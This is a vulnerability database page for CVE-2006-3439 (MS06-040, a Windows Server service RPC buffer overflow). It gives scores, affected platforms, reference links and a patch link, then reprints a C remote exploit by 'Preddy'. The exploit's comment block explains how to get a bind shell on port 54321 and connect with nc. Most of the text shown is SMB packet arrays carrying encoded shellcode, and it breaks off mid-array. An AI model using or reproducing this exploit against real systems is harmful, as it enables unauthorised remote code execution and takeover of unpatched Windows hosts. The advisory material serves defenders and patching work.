CVE-2006-3439
CVSS 10.0
Published: 2006-08-08 21:04:00
Revised: 2011-03-07 21:38:39

[Original text] Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314.


[CNNVD] Microsoft Windows Server Service Remote Buffer Overflow Vulnerability (MS06-040) (CNNVD-200608-123)

        Microsoft Windows is a very popular operating system released by Microsoft.
        The Server service in Microsoft Windows contains a stack buffer overflow in its handling of traffic on the RPC interface; a remote attacker can trigger it by sending a malicious RPC message, leading to execution of arbitrary instructions.
        The vulnerability is relatively easy to exploit and affects a wide range of systems; worms that spread through it have already appeared.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: COMPLETE [complete information disclosure exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may lead to a complete system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:microsoft:windows_xp::sp2:tablet_pc (Microsoft windows xp_sp2 tablet_pc)
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_2003_server:itanium
cpe:/o:microsoft:windows_2000::sp4::fr
cpe:/o:microsoft:windows_2003_server:sp1::itanium
cpe:/o:microsoft:windows_2003_server:sp1
cpe:/o:microsoft:windows_2003_server:64-bit
cpe:/o:microsoft:windows_xp:::64-bit
cpe:/o:microsoft:windows_xp::sp1:tablet_pc (Microsoft windows xp_sp1 tablet_pc)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:492 Buffer Overrun in Server Service Vulnerability
*OVAL describes in detail how to detect this vulnerability; more technical detail on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3439
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3439
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200608-123
(official data source) CNNVD

- Other links and resources

http://www.us-cert.gov/cas/techalerts/TA06-220A.html
(PATCH)  CERT  TA06-220A
http://www.kb.cert.org/vuls/id/650769
(PATCH)  CERT-VN  VU#650769
http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx
(PATCH)  MS  MS06-040
http://secunia.com/advisories/21388
(VENDOR_ADVISORY)  SECUNIA  21388
http://xforce.iss.net/xforce/xfdb/28002
(UNKNOWN)  XF  ms-server-service-bo(28002)
http://www.vupen.com/english/advisories/2006/3210
(UNKNOWN)  VUPEN  ADV-2006-3210
http://www.securityfocus.com/bid/19409
(UNKNOWN)  BID  19409
http://www.dhs.gov/dhspublic/display?content=5789
(UNKNOWN)  MISC  http://www.dhs.gov/dhspublic/display?content=5789
http://securitytracker.com/id?1016667
(UNKNOWN)  SECTRACK  1016667
http://www.cisco.com/en/US/products/ps6120/tsd_products_security_response09186a008070c75a.html
(UNKNOWN)  CISCO  20060814 Mitigating Exploitation of the MS06-040 Service Buffer Vulnerability

- Vulnerability information

Microsoft Windows Server Service Remote Buffer Overflow Vulnerability (MS06-040)
Critical  Buffer overflow
2006-08-08 00:00:00 2006-08-18 00:00:00
Remote

- Advisory and patch

        The vendor has released an update to fix this security issue; patch download link:
        http://www.microsoft.com/technet/security/bulletin/ms06-040.mspx?pf=true

- Vulnerability information (2223)

MS Windows CanonicalizePathName() Remote Exploit (MS06-040) (EDBID:2223)
Platform: windows  Type: remote
Date: 2006-08-19  Verified
Port: 139  Author: Preddy
/*

Microsoft Windows CanonicalizePathName() Remote Overflow MS06-040
More info: http://www.microsoft.com/technet/security/bulletin/MS06-040.mspx
Written by Preddy

This is another version of hdm's metasploit version but ported to C,
Works against Windows XP SP1
And it should give a crash on Win2k in services.exe

On successful exploitation it provides a remote shell at port 54321
of your victim:

./ms06 192.168.1.103
Target: 192.168.1.103
Attack Finished: now open a new terminal and nc to your victim on port 54321
Warning: Don't close this window!

[open a new terminal/window/prompt]

nc 192.168.1.103 54321
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

http://www.team-rootshell.com

Greetz to all of my friends at:

FREENODE(irc.freenode.net): ##c,##linux,##php,##security,##slackware,#fluxbox,#perl,#remote-exploit,#tor
MILW0RM(ABS.lcirc.net): #milw0rm
STS(irc.smashthestack.org): #lecture,#social (special greetz to: esper and crystal)
PTP(irc.eu.pulltheplug.org): #aso,#Social
GSO(gso.eclipticx.net): #gso-chat
TTNET(irc.ttnet.net.tr):#coders,#linux,#nukedx,#zion,#php
SSTNET(irc.0x557.net):#darpa,#exploits,#m00,#ph4nt0m,#rx.rx,#segfault,#sscan

Rootshell Security Group and everyone else ^^

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <fcntl.h>
#include <signal.h>
#include <errno.h>
#include <unistd.h>
#include <stdarg.h>
#include <sys/mman.h>

#define PORT 139

char peer0_0[] = {
0x81, 0x00, 0x00, 0x44, 0x20, 0x43, 0x4b, 0x46, 
0x44, 0x45, 0x4e, 0x45, 0x43, 0x46, 0x44, 0x45, 
0x46, 0x46, 0x43, 0x46, 0x47, 0x45, 0x46, 0x46, 
0x43, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x00, 0x20, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 0x41, 0x43, 
0x41, 0x43, 0x41, 0x43, 0x41, 0x41, 0x41, 0x00 };

char peer0_1[] = {
0x00, 0x00, 0x00, 0x54, 0xff, 0x53, 0x4d, 0x42, 
0x72, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x00, 0x84, 0xec, 0x00, 0x31, 0x00, 0x02, 
0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x31, 0x2e, 
0x30, 0x00, 0x02, 0x4c, 0x4d, 0x31, 0x2e, 0x32, 
0x58, 0x30, 0x30, 0x32, 0x00, 0x02, 0x4e, 0x54, 
0x20, 0x4c, 0x41, 0x4e, 0x4d, 0x41, 0x4e, 0x20, 
0x31, 0x2e, 0x30, 0x00, 0x02, 0x4e, 0x54, 0x20, 
0x4c, 0x4d, 0x20, 0x30, 0x2e, 0x31, 0x32, 0x00 };

char peer0_2[] = {
0x00, 0x00, 0x00, 0xb5, 0xff, 0x53, 0x4d, 0x42, 
0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x00, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, 
0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x57, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x5c, 0xd0, 0x00, 0x80, 0x7a, 0x00, 0x60, 
0x55, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05, 0x05, 
0x02, 0xa0, 0x4b, 0x30, 0x49, 0xa0, 0x0e, 0x30, 
0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 
0x82, 0x37, 0x02, 0x02, 0x0a, 0xa2, 0x37, 0x04, 
0x35, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 0x53, 0x50, 
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x02, 0x08, 
0x00, 0x09, 0x00, 0x09, 0x00, 0x20, 0x00, 0x00, 
0x00, 0x0c, 0x00, 0x0c, 0x00, 0x29, 0x00, 0x00, 
0x00, 0x57, 0x4f, 0x52, 0x4b, 0x47, 0x52, 0x4f, 
0x55, 0x50, 0x57, 0x4f, 0x52, 0x4b, 0x53, 0x54, 
0x41, 0x54, 0x49, 0x4f, 0x4e, 0x31, 0x57, 0x69, 
0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 
0x30, 0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 
0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 
0x32, 0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 
0x00 };

char peer0_3[] = {
0x00, 0x00, 0x01, 0x04, 0xff, 0x53, 0x4d, 0x42, 
0x73, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x28, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0c, 0xff, 0x00, 0x00, 
0x00, 0xdf, 0xff, 0x02, 0x00, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0xa6, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x5c, 0xd0, 0x00, 0x80, 0xc9, 0x00, 0xa1, 
0x81, 0xa3, 0x30, 0x81, 0xa0, 0xa2, 0x81, 0x9d, 
0x04, 0x81, 0x9a, 0x4e, 0x54, 0x4c, 0x4d, 0x53, 
0x53, 0x50, 0x00, 0x03, 0x00, 0x00, 0x00, 0x18, 
0x00, 0x18, 0x00, 0x40, 0x00, 0x00, 0x00, 0x18, 
0x00, 0x18, 0x00, 0x58, 0x00, 0x00, 0x00, 0x12, 
0x00, 0x12, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x82, 0x00, 0x00, 0x00, 0x18, 
0x00, 0x18, 0x00, 0x82, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x02, 0x08, 0x00, 0x00, 0x01, 0x02, 0x03, 0x04, 
0x05, 0x06, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x25, 0xa6, 0x9f, 0x80, 0x96, 
0x31, 0x6c, 0xca, 0xa0, 0x08, 0x9f, 0x12, 0x7e, 
0x47, 0xcd, 0x45, 0x10, 0x25, 0x39, 0x7d, 0xf8, 
0x55, 0x66, 0x03, 0x57, 0x00, 0x4f, 0x00, 0x52, 
0x00, 0x4b, 0x00, 0x47, 0x00, 0x52, 0x00, 0x4f, 
0x00, 0x55, 0x00, 0x50, 0x00, 0x57, 0x00, 0x4f, 
0x00, 0x52, 0x00, 0x4b, 0x00, 0x53, 0x00, 0x54, 
0x00, 0x41, 0x00, 0x54, 0x00, 0x49, 0x00, 0x4f, 
0x00, 0x4e, 0x00, 0x31, 0x00, 0x57, 0x69, 0x6e, 
0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 0x30, 0x30, 
0x30, 0x20, 0x32, 0x31, 0x39, 0x35, 0x00, 0x57, 
0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x32, 
0x30, 0x30, 0x30, 0x20, 0x35, 0x2e, 0x30, 0x00 };

char peer0_4[] = {
0x00, 0x00, 0x00, 0x3a, 0xff, 0x53, 0x4d, 0x42, 
0x75, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x04, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x01, 0x00, 0x0f, 0x00, 0x00, 
0x5c, 0x5c, 0x5c, 0x49, 0x50, 0x43, 0x24, 0x00, 
0x3f, 0x3f, 0x3f, 0x3f, 0x3f, 0x00 };

char peer0_5[] = {
0x00, 0x00, 0x00, 0x5c, 0xff, 0x53, 0x4d, 0x42, 
0xa2, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x18, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x08, 0x00, 0x16, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x9f, 0x01, 0x02, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 
0x01, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 
0x02, 0x00, 0x00, 0x00, 0x00, 0x09, 0x00, 0x5c, 
0x42, 0x52, 0x4f, 0x57, 0x53, 0x45, 0x52, 0x00 };

char peer0_6[] = {
0x00, 0x00, 0x00, 0x92, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x48, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x48, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x4f, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 0x48, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xd0, 0x16, 
0xd0, 0x16, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0xc8, 0x4f, 
0x32, 0x4b, 0x70, 0x16, 0xd3, 0x01, 0x12, 0x78, 
0x5a, 0x47, 0xbf, 0x6e, 0xe1, 0x88, 0x03, 0x00, 
0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 
0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 
0x48, 0x60, 0x02, 0x00, 0x00, 0x00 };

char peer0_7[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, 
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 
0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, 
0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, 
0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, 
0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, 
0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 
0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, 
0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, 
0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, 
0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 
0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, 
0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, 
0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, 
0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, 
0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, 
0x9c, 0xc8, 0xa1, 0x87, 0xcd, 0x2c, 0xc1, 0xbe, 
0x62, 0x21, 0x61, 0x53, 0xb6, 0x31, 0x2b, 0x33, 
0xea, 0x01, 0xa1, 0x51, 0x85, 0x09, 0x36, 0xb9, 
0x2a, 0x1c, 0xf1, 0xbc, 0x62, 0x6e, 0x1a, 0x53, 
0xa9, 0x21, 0xa1, 0xa8, 0xf5, 0x80, 0xa1, 0x98, 
0xe1, 0x73, 0x42, 0x56, 0xa7, 0x23, 0xc6, 0x88, 
0x16, 0xfb, 0x4c, 0x8b, 0x8f, 0x45, 0x19, 0xea, 
0x81, 0x5a, 0x59, 0xea, 0xb6, 0x79, 0xd5, 0x08, 
0x81, 0xe6, 0xc7, 0x24, 0xd2, 0x7d, 0xd5, 0x0e, 
0xb6, 0xa4, 0xcf, 0xbe, 0x68, 0xc0, 0x22, 0xda, 
0xbc, 0x47, 0x28, 0x27, 0x39, 0x45, 0xf3, 0xd1, 
0x1c, 0x80, 0x7d, 0x27, 0x3f, 0x7e, 0x79, 0x8b, 
0xba, 0x7e, 0x69, 0x8b, 0xaa, 0x7e, 0xd5, 0x08, 
0x8f, 0x45, 0xfe, 0xe9, 0x8f, 0x7e, 0xa3, 0x39, 
0x7c, 0x45, 0x8e };

char peer0_8[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x18, 0x01, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0xc2, 0x99, 0xea, 0x7d, 0x27, 
0x3f, 0x47, 0x3a, 0x89, 0xbc, 0xd2, 0xfa, 0xb0, 
0x4d, 0x80, 0x04, 0x31, 0xbe, 0xd2, 0xfc, 0x8b, 
0xbc, 0xd2, 0xfa, 0xb0, 0x0c, 0x64, 0xac, 0x91, 
0xbe, 0xd2, 0xfc, 0x88, 0xbd, 0x79, 0x7f, 0x27, 
0x39, 0xbe, 0x42, 0x3f, 0x90, 0xeb, 0x53, 0x8f, 
0x16, 0xfb, 0x7f, 0x27, 0x39, 0x4b, 0x40, 0xbc, 
0x8f, 0x45, 0x49, 0xb5, 0x60, 0xc8, 0x40, 0x88, 
0xb0, 0x04, 0xe6, 0x51, 0x0e, 0x47, 0x6e, 0x51, 
0x0b, 0x1c, 0xea, 0x2b, 0x43, 0xd3, 0x68, 0xf5, 
0x17, 0x6f, 0x06, 0x4b, 0x64, 0x57, 0x12, 0x73, 
0x42, 0x86, 0x42, 0xaa, 0x17, 0x9e, 0x3c, 0x27, 
0x9c, 0x69, 0xd5, 0x0e, 0xb2, 0x7a, 0x78, 0x89, 
0xb8, 0x7c, 0x40, 0xd9, 0xb8, 0x7c, 0x7f, 0x89, 
0x16, 0xfd, 0x42, 0x75, 0x30, 0x28, 0xe4, 0x8b, 
0x16, 0xfb, 0x40, 0x27, 0x16, 0x1a, 0xd5, 0x08, 
0x62, 0x7a, 0xd6, 0x5b, 0x2d, 0x49, 0xd5, 0x0e, 
0xbb, 0xd2, 0xfa, 0xb0, 0x06, 0xe3, 0xca, 0xb8, 
0xba, 0xd2, 0xfc, 0x27, 0x39, 0x61, 0x72, 0x5a, 
0x34, 0x54, 0x46, 0x4c, 0x45, 0x44, 0x38, 0x4f, 
0x6a, 0x44, 0x33, 0x41, 0x49, 0x43, 0x49, 0x53, 
0x52, 0x37, 0x41, 0x31, 0x34, 0x67, 0x66, 0x70, 
0x41, 0x47, 0x41, 0x49, 0x34, 0x4d, 0x76, 0x75, 
0x62, 0x31, 0x79, 0x57, 0x54, 0x64, 0x54, 0x5a, 
0x6f, 0x45, 0x6e, 0x47, 0x71, 0x67, 0x52, 0x31, 
0x66, 0x45, 0x5a, 0x6d, 0x41, 0x71, 0x39, 0x4c, 
0x4c, 0x7a, 0x48, 0x6f, 0x50, 0x74, 0x4c, 0x47, 
0x61, 0x6a, 0x30, 0x55, 0x69, 0x68, 0x7a, 0x7a, 
0x6b, 0x69, 0x33, 0x4c, 0x70, 0x34, 0x47, 0x53, 
0x4a, 0x54, 0x74, 0x39, 0x58, 0x33, 0x78, 0x43, 
0x67, 0x54, 0x74, 0x58, 0x77, 0x32, 0x77, 0x42, 
0x52, 0x4d, 0x57, 0x70, 0x36, 0x75, 0x38, 0x33, 
0x52, 0x66, 0x79 };

char peer0_9[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x30, 0x02, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x00, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x52, 0x36, 0x36, 0x37, 0x4e, 
0x54, 0x6f, 0x48, 0x76, 0x51, 0x32, 0x63, 0x68, 
0x67, 0x36, 0x68, 0x43, 0x39, 0x54, 0x46, 0x4b, 
0x67, 0x79, 0x56, 0x57, 0x53, 0x45, 0x39, 0x42, 
0x4a, 0x65, 0x4f, 0x57, 0x73, 0x42, 0x6b, 0x39, 
0x52, 0x76, 0x31, 0x56, 0x42, 0x6e, 0x42, 0x70, 
0x75, 0x42, 0x46, 0x58, 0x35, 0x48, 0x46, 0x62, 
0x4a, 0x78, 0x6d, 0x33, 0x53, 0x50, 0x34, 0x30, 
0x7a, 0x76, 0x46, 0x6c, 0x4f, 0x54, 0x37, 0x6a, 
0x4a, 0x45, 0x59, 0x54, 0x6f, 0x69, 0x62, 0x36, 
0x65, 0x57, 0x6a, 0x32, 0x44, 0x63, 0x31, 0x65, 
0x4b, 0x36, 0x59, 0x55, 0x33, 0x32, 0x38, 0x78, 
0x5a, 0x64, 0x42, 0x75, 0x56, 0x79, 0x52, 0x70, 
0x36, 0x33, 0x47, 0x45, 0x7a, 0x31, 0x72, 0x36, 
0x51, 0x50, 0x35, 0x70, 0x4f, 0x58, 0x59, 0x31, 
0x75, 0x32, 0x39, 0x70, 0x74, 0x50, 0x41, 0x6a, 
0x34, 0x65, 0x7a, 0x78, 0x69, 0x50, 0x59, 0x0a, 
0x08, 0x02, 0x00, 0x4a, 0x52, 0x57, 0x6c, 0x39, 
0x50, 0x77, 0x38, 0x04, 0x08, 0x02, 0x00, 0x32, 
0x37, 0x49, 0x49, 0x56, 0x6d, 0x6f, 0x55, 0x68, 
0x56, 0x69, 0x51, 0x41, 0x35, 0x43, 0x4c, 0x47, 
0x6b, 0x4f, 0x45, 0x30, 0x51, 0x36, 0x52, 0x30, 
0x6f, 0x64, 0x74, 0x78, 0x65, 0x32, 0x70, 0x04, 
0x08, 0x02, 0x00, 0x35, 0x79, 0x78, 0x32, 0x78, 
0x70, 0x38, 0x35, 0x04, 0x08, 0x02, 0x00, 0x51, 
0x67, 0x39, 0x36, 0x4a, 0x71, 0x65, 0x72, 0x56, 
0x55, 0x47, 0x58, 0x53, 0x58, 0x59, 0x4f, 0x61, 
0x61, 0x7a, 0x47, 0x62, 0x48, 0x56, 0x61, 0x73, 
0x33, 0x4d, 0x4b, 0x34, 0x42, 0x39, 0x79, 0x00, 
0x00, 0xbf, 0xf9, 0x78, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xb4, 0xee, 0x7b, 
0x00, 0x00, 0x00 };

char peer0_10[] = {
0x00, 0x00, 0x00, 0x66, 0xff, 0x53, 0x4d, 0x42, 
0x25, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x10, 0x00, 0x00, 0x1c, 
0x00, 0x00, 0x04, 0xe0, 0xff, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x4a, 0x00, 0x1c, 0x00, 0x4a, 0x00, 0x02, 
0x00, 0x26, 0x00, 0x00, 0x40, 0x23, 0x00, 0x5c, 
0x50, 0x49, 0x50, 0x45, 0x5c, 0x00, 0x05, 0x00, 
0x00, 0x02, 0x10, 0x00, 0x00, 0x00, 0x1c, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x04, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x1f, 0x00, 0x00, 0x00, 
0x00, 0x00 };

char peer0_11[] = {
0x00, 0x00, 0x01, 0x57, 0xff, 0x53, 0x4d, 0x42, 
0x2f, 0x00, 0x00, 0x00, 0x00, 0x18, 0x01, 0x20, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x30, 0x1d, 
0x00, 0x08, 0x84, 0xec, 0x0e, 0xff, 0x00, 0x00, 
0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0xff, 
0xff, 0xff, 0xff, 0x08, 0x00, 0x18, 0x01, 0x00, 
0x00, 0x18, 0x01, 0x3f, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x18, 0x01, 0x05, 0x00, 0x00, 0x01, 0x10, 
0x00, 0x00, 0x00, 0x18, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x00, 0x1f, 0x00, 0x1c, 0x67, 0xc4, 0x18, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 
0x00, 0x00, 0x00, 0x00, 0x00, 0xbf, 0x34, 0x63, 
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63, 
0x01, 0x00, 0x00, 0x93, 0x48, 0x96, 0x48, 0xfc, 
0x40, 0x93, 0x98, 0xf9, 0x98, 0x9f, 0x9f, 0x96, 
0x37, 0x27, 0x90, 0x40, 0x9f, 0x4b, 0x4e, 0xd6, 
0x93, 0x2b, 0xc9, 0x83, 0xe9, 0xaf, 0xd9, 0xee, 
0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 
0x2d, 0x2a, 0xd8, 0xe9, 0x83, 0xeb, 0xfc, 0xe2, 
0xf4, 0xac, 0xee, 0x27, 0x06, 0xd2, 0xd5, 0x9c, 
0x15, 0x47, 0xc1, 0x95, 0x01, 0xd4, 0xd5, 0x27, 
0x16, 0x4d, 0xa1, 0xb4, 0xcd, 0x09, 0xa1, 0x9d, 
0xd5, 0xa6, 0x56, 0xdd, 0x91, 0x2c, 0xc5, 0x53, 
0xa6, 0x35, 0xa1, 0x87, 0xc9, 0x2c, 0xc1, 0x91, 
0x62, 0x19, 0xa1, 0xd9, 0x07, 0x1c, 0xea, 0x41, 
0x45, 0xa9, 0xea, 0xac, 0xee, 0xec, 0xe0, 0xd5, 
0xe8, 0xef, 0xc1, 0x2c, 0xd2, 0x79, 0x0e, 0xf0, 
